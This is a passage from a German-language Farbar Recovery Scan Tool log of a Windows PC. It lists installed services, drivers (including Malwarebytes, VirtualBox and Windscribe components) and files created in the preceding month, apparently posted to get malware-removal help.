S3 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [744968 2020-04-09] (Oracle Corporation -> Oracle Corporation)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [147392 2019-04-30] (Microsoft Corporation -> Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [4098056 2019-03-19] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [113992 2019-03-19] (Microsoft Corporation -> Microsoft Corporation)
R2 WindscribeService; C:\Program Files (x86)\Windscribe\WindscribeService.exe [493232 2019-01-19] (Windscribe Limited -> Windscribe Limited)
R2 Wondershare InstallAssist; C:\ProgramData\Wondershare\Service\InstallAssistService.exe [269200 2020-04-02] (Wondershare Technology Co.,Ltd -> Wondershare)
S2 ElevationService; C:\Program Files (x86)\Wondershare\soziale Apps wiederherstellen (Deutsch) (CPC)\Addins\SocialApps\ElevationService.exe [X]
S2 ImControllerService; %SystemRoot%\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [X]
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nvlt.inf_amd64_6de98d46a9fc896b\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nvlt.inf_amd64_6de98d46a9fc896b\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
S2 WsDrvInst; C:\Program Files (x86)\Wondershare\soziale Apps wiederherstellen (Deutsch) (CPC)\Addins\SocialApps\DriverInstall.exe [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 AppleKmdfFilter; C:\Windows\System32\drivers\AppleKmdfFilter.sys [20640 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35560 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [231936 2019-10-07] (Microsoft Corporation) [Datei ist nicht signiert]
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153312 2020-09-30] (Malwarebytes Corporation -> Malwarebytes)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [217592 2020-09-30] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [19912 2020-09-30] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [197280 2020-10-06] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [73880 2020-10-06] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [248968 2020-09-30] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [131232 2020-10-06] (Malwarebytes Inc -> Malwarebytes)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166760 2019-09-26] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 tapwindscribe0901; C:\Windows\System32\drivers\tapwindscribe0901.sys [54896 2018-07-06] (Windscribe Limited -> The OpenVPN Project)
U3 TrueSight; C:\Windows\System32\drivers\truesight.sys [38032 2020-10-06] (Adlice -> )
R3 VBAudioVMVAIOMME; C:\Windows\System32\drivers\vbaudio_vmvaio64_win10.sys [71712 2020-06-15] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBoxNetAdp; C:\Windows\system32\DRIVERS\VBoxNetAdp6.sys [237824 2020-04-09] (Oracle Corporation -> Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\system32\DRIVERS\VBoxNetLwf.sys [247224 2020-04-09] (Oracle Corporation -> Oracle Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46472 2019-03-19] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [333784 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [62432 2019-03-19] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-10-06 02:10 - 2020-10-06 02:10 - 000197280 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2020-10-06 02:10 - 2020-10-06 02:10 - 000131232 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2020-10-06 02:10 - 2020-10-06 02:10 - 000073880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2020-10-06 01:58 - 2020-10-06 02:10 - 000000000 ____D C:\AdwCleaner
2020-10-06 01:52 - 2020-10-06 01:53 - 008414384 _____ (Malwarebytes) C:\Users\samim\Downloads\adwcleaner_8.0.7.exe
2020-10-05 20:28 - 2020-10-05 20:28 - 024828526 _____ C:\Users\samim\Downloads\Kunst Story Board Film JB JH FR SM.mp4
2020-10-05 20:23 - 2020-10-05 20:23 - 120735964 _____ C:\Users\samim\Downloads\Kunst Story Board Film JB JH FR SM.avi
2020-10-05 20:23 - 2020-10-05 20:23 - 012401117 _____ C:\Users\samim\Downloads\Kunst Story Board Film JB JH FR SM.wmv
2020-10-05 20:17 - 2020-10-05 20:17 - 000009596 _____ C:\Users\samim\Downloads\Kunst Story Board Film JB JH FR SM.mlt
2020-10-05 20:06 - 2020-10-05 20:06 - 025065715 _____ C:\Users\samim\Downloads\VID_20201001_155027.mp4
2020-10-05 19:54 - 2020-10-05 19:55 - 036711600 _____ C:\Users\samim\Downloads\VID_20201001_155727.mp4
2020-10-05 19:54 - 2020-10-05 19:55 - 017969993 _____ C:\Users\samim\Downloads\VID_20201001_154504(1).mp4
2020-10-05 19:54 - 2020-10-05 19:54 - 017969993 _____ C:\Users\samim\Downloads\VID_20201001_154504.mp4
2020-10-05 17:35 - 2020-10-05 23:06 - 000021518 _____ C:\Users\samim\Downloads\Fixlog.txt
2020-10-04 12:09 - 2020-10-06 11:03 - 000000000 ____D C:\FRST
2020-10-04 12:09 - 2020-10-05 17:33 - 000000000 ____D C:\Users\samim\Downloads\FRST-OlderVersion
2020-10-03 21:11 - 2020-10-03 21:11 - 000000000 _____ C:\Windows\system32\Tasks\CIS_81EFDD93-DBBE-415B-BE6E-49B9664E3E82
2020-10-03 10:38 - 2020-10-06 11:03 - 000027216 _____ C:\Users\samim\Downloads\FRST.txt
2020-10-03 10:35 - 2020-10-04 12:13 - 000062592 _____ C:\Users\samim\Downloads\Addition.txt
2020-10-03 10:17 - 2020-10-05 17:33 - 002299392 _____ (Farbar) C:\Users\samim\Downloads\FRST64.exe
2020-10-02 22:40 - 2020-10-03 21:13 - 000000000 ___HD C:\VTRoot
2020-10-02 21:07 - 2020-10-06 10:34 - 000038032 _____ C:\Windows\system32\Drivers\truesight.sys
2020-10-02 21:06 - 2020-10-02 21:06 - 000000910 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2020-10-02 21:06 - 2020-10-02 21:06 - 000000910 _____ C:\ProgramData\Desktop\RogueKiller.lnk
2020-10-02 21:06 - 2020-10-02 21:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2020-10-02 21:06 - 2020-10-02 21:06 - 000000000 ____D C:\Program Files\RogueKiller
2020-10-02 21:05 - 2020-10-02 21:12 - 000000000 ____D C:\ProgramData\RogueKiller
2020-10-02 21:05 - 2020-10-02 21:05 - 040327848 _____ (Adlice Software ) C:\Users\samim\Downloads\RogueKiller_setup.exe
2020-10-02 20:59 - 2020-10-02 20:59 - 000000000 ____D C:\Windows\system32\Tasks\Mozilla
2020-10-02 20:47 - 2020-10-02 20:59 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-02 20:41 - 2020-10-02 20:57 - 000000000 ____D C:\Program Files (x86)\COMODO
2020-10-02 20:39 - 2020-10-02 20:39 - 091264856 _____ (ITarian) C:\Users\samim\Downloads\installer_120e446b3f28f.exe
2020-10-01 22:23 - 2020-10-01 22:23 - 000066883 _____ C:\Users\samim\AppData\Local\recently-used.xbel
2020-09-30 18:25 - 2020-09-30 18:25 - 000248968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2020-09-30 18:25 - 2020-09-30 18:25 - 000217592 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2020-09-30 18:25 - 2020-09-30 18:25 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2020-09-30 18:25 - 2020-09-30 18:25 - 000019912 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2020-09-30 18:25 - 2020-09-30 18:25 - 000002044 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2020-09-30 18:25 - 2020-09-30 18:25 - 000002032 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2020-09-30 18:25 - 2020-09-30 18:25 - 000002032 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2020-09-30 18:25 - 2020-09-30 18:25 - 000000000 ____D C:\Users\samim\AppData\Local\mbam
2020-09-30 18:25 - 2020-09-30 18:25 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-09-30 18:24 - 2020-09-30 18:24 - 000000000 ____D C:\Program Files\Malwarebytes
2020-09-30 18:22 - 2020-09-30 18:22 - 002040904 _____ (Malwarebytes) C:\Users\samim\Downloads\MBSetup-0045974.0045974-consumer.exe
2020-09-25 21:14 - 2020-09-25 21:11 - 000000213 _____ C:\Users\samim\Downloads\SM funktionen.bak
2020-09-25 21:11 - 2020-09-25 21:14 - 000000213 _____ C:\Users\samim\Downloads\SM funktionen.rkt
2020-09-25 20:47 - 2020-09-26 18:37 - 000001374 _____ C:\Users\samim\Downloads\SM counter.bak
2020-09-24 06:17 - 2020-09-24 06:17 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2020-09-22 23:30 - 2020-09-30 18:49 - 000001508 _____ C:\Users\samim\Downloads\SM counter.ss
2020-09-22 23:29 - 2020-09-22 22:26 - 000000120 _____ C:\Users\samim\Downloads\einfuehrungsbsp (1).bak
2020-09-22 22:26 - 2020-09-22 23:29 - 000001022 _____ C:\Users\samim\Downloads\einfuehrungsbsp (1).ss
2020-09-22 22:26 - 2020-09-22 22:26 - 000000120 _____ C:\Users\samim\Downloads\einfuehrungsbsp.ss
2020-09-12 17:26 - 2020-09-12 17:26 - 032928920 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecsRaw.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 031598936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecsRaw.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 025444864 _____ (Microsoft Corporation) C:\Windows\system32\Hydrogen.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 022642176 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 019852288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 019812864 _____ (Microsoft Corporation) C:\Windows\system32\HologramWorld.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 018032128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 007761408 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 007284736 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 006526448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 006304256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 006069360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 005907456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 005848848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 005767744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 005503488 _____ (Microsoft Corporation) C:\Windows\system32\cdp.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 005003832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepository.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 004859904 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 004605952 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 004538368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 004309504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdp.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 004129416 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 003822592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 003740456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 003525608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 003501568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 002799104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
2020-09-12 17:26 - 2020-09-12 17:26 - 002585032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 002576896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 002565120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 002494752 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 002422384 _____ (Microsoft Corporation) C:\Windows\system32\WMVCORE.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 002315472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 002306048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 002259680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 002230240 _____ (Microsoft Corporation) C:\Windows\system32\mfasfsrcsnk.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 002138264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVCORE.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 001957552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001750016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallService.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001672544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001664696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001610240 _____ (Microsoft Corporation) C:\Windows\system32\HologramCompositor.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001521664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbghelp.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001512960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdprt.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001491160 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001459200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001421392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32full.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001397560 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 001369088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001326592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001313792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjet40.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001307464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ContentDeliveryManager.Utilities.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001272160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfasfsrcsnk.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001247744 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 001246208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001218424 _____ (Microsoft Corporation) C:\Windows\system32\ClipUp.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 001151808 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001138688 _____ (Microsoft Corporation) C:\Windows\system32\nettrace.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001124864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Vpn.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001108384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001099600 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001098720 _____ (Microsoft Corporation) C:\Windows\system32\DolbyDecMFT.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001077048 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 001054160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001039872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 001012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 001009200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000952416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DolbyDecMFT.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000941568 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000928768 _____ (Microsoft Corporation) C:\Windows\system32\WFS.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000894032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000892728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWAHost.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000882688 _____ (Microsoft Corporation) C:\Windows\system32\CPFilters.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000867328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000864768 _____ (Microsoft Corporation) C:\Windows\system32\ieproxy.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000844088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CloudExperienceHostCommon.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000783496 _____ (Microsoft Corporation) C:\Windows\system32\tcblaunch.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000776192 _____ (Microsoft Corporation) C:\Windows\system32\nshwfp.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000775768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000775480 _____ (Microsoft Corporation) C:\Windows\system32\securekernel.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000768504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000748384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000744240 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 000738072 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 000724480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fveapi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000709632 _____ (Microsoft Corporation) C:\Windows\system32\AppReadiness.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000706560 _____ (Microsoft Corporation) C:\Windows\system32\wsecedit.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000705536 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Mirage.Internal.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000682752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 000675032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000671560 _____ (Microsoft Corporation) C:\Windows\system32\computecore.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000670720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000669696 _____ (Microsoft Corporation) C:\Windows\system32\WFSR.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000667312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PCPKsp.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000666288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 000652800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000632320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000628400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000609280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nshwfp.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000600064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ActivationManager.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000593480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000588800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfh264enc.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000574976 _____ (Microsoft Corporation) C:\Windows\system32\mfh264enc.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000572208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryPS.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000564480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StateRepository.Core.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000562176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000553664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreMessaging.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsecedit.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000537608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000529920 _____ (Microsoft Corporation) C:\Windows\system32\nltest.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000528896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ddraw.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000522752 _____ (Microsoft Corporation) C:\Windows\system32\WinBioDataModel.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000516544 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.FileExplorer.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000466432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\daxexec.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000466352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\policymanager.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000462848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000457216 _____ (Microsoft Corporation) C:\Windows\system32\upnphost.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000424448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputSwitch.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000422008 _____ (Microsoft Corporation) C:\Windows\system32\SgrmEnclave_secure.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000420168 _____ (Microsoft Corporation) C:\Windows\system32\MSAudDecMFT.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000415232 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOMPOSE.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000410624 _____ (Microsoft Corporation) C:\Windows\system32\rascustom.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000408576 _____ (Microsoft Corporation) C:\Windows\system32\fveapibase.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000404480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Payments.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieproxy.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000353280 _____ (Microsoft Corporation) C:\Windows\system32\pnrpsvc.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000338944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fveapibase.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000336384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000330752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\upnphost.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000328192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgeIso.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000324608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcore.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32k.sys
2020-09-12 17:26 - 2020-09-12 17:26 - 000307712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000299520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000299072 _____ (Microsoft Corporation) C:\Windows\system32\SIHClient.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000294728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\thumbcache.dll
